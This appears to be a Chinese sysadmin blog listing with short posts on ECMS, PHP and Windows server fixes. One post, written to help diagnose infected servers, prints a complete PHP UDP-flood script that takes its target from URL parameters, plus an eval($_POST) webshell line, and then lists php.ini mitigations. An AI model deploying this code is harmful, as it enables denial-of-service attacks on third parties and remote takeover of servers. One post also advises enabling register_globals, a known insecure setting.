预览模式: 普通 | 列表

ECMS 内容页会员组判断

修改栏目,把内容页扩展名改为.php
然后模板里加php验证代码
模板加这个代码
<!--code.start-->?
if(!$_COOKIE[ecmsmlgroupid])

查看更多...

分类:ECMS | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2467

特征:

用PHP代码调用sockets,直接用服务器的网络攻击别的IP,常见代码如下: 

 

PHP代码
  1. <?php    
  2.   
  3.   
  4. $packets = 0;    
  5. $ip = $_GET[\'ip\'];   
  6. $rand = $_GET[\'port\'];   
  7. set_time_limit(0);   
  8. ignore_user_abort(FALSE);   
  9.  
  10. $exec_time = $_GET[\'time\'];   
  11.  
  12. $time = time();   
  13. print \"Flooded: $ip on port $rand   
  14.  
  15. \";   
  16. $max_time = $time+$exec_time;   
  17.  
  18.  
  19. for($i=0;$i<65535;$i++){   
  20. $out .= \"X\";   
  21.  
  22. while(1){   
  23. $packets++;   
  24. if(time() > $max_time){   
  25. break;   
  26.  
  27.  
  28. $fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);   
  29. if($fp){   
  30. fwrite($fp, $out);   
  31. fclose($fp);   
  32.  
  33.  
  34. echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";    
  35. ?>    
  36. <?php eval($_POST[ddos])?>   



表现特征:

一打开IIS,服务器的流出带宽就用光-----就是说服务器不断向别人发包,这个情况和受到DDOS攻击是不同的,DDOS是不断收到大量数据包.

解决办法:


在php.ini里设其值为Off

allow_url_fopen = Off

并且:

;extension=php_sockets.dll

前面的;号一定要有,意思就是限制用sockets.dll

然后重启IIS

分类:Servers | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2110

phome_enewsmember表 重复用户名

Duplicate entry '孟子' for key 'username'
alter table ***_enewsmember Drop INDEX username, add UNIQUE(username);

原因:phome_enewsmember表有重复用户名的记录导致。
解决办法:用phpmyadmin进数据库删除phome_enewsmember表重复用户名的记录,查找方法可以用

查看更多...

分类:ECMS | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2261

新版PHP5.2.11 导致UCenter通信不稳定

经过多种服务器环境测试
新版PHP5.2.11 导致UCenter通信不稳定
换老版本后 完全正常
这个问题 困扰我好几天
分类:Servers | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1780
在安装zeroboard v4.1时 一直在安装页刷新的解决方法

有个客户要安装这个程序,安装的时候一直在安装页刷新。
原来是需要修改php.ini
在php.ini找到register_globals= off  修改成register_globals=on    然

查看更多...

分类:ZeroBoard/XE | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 4541

修改远程密码后,要修改AT服务账户

修改远程密码后,要修改AT服务账户
进入控制面板,用资源管理器打开任务计划,然后在 菜单栏的高级选项中找到 AT服务账户,将运行用户改为超级管理员 帐号与密码(就是您默认使用的远程桌面帐号密码),然后进入服务中重启 Task Scheduler 计划任务.
分类:Servers | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1978

PHP magic_quotes_gpc

PHP 设置 magic_quotes_gpc=on  否则ECMS 模板内的斜杠 无法显示

查看更多...

分类:ECMS | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1985

联系方式查看权限

把show.php放到e目录里,内容为如下:

<?php
require("class/connect.php");
include("class/db_sql.php");

查看更多...

分类:ECMS | 固定链接 | 禁止评论 | 引用: 0 | 查看次数: 2196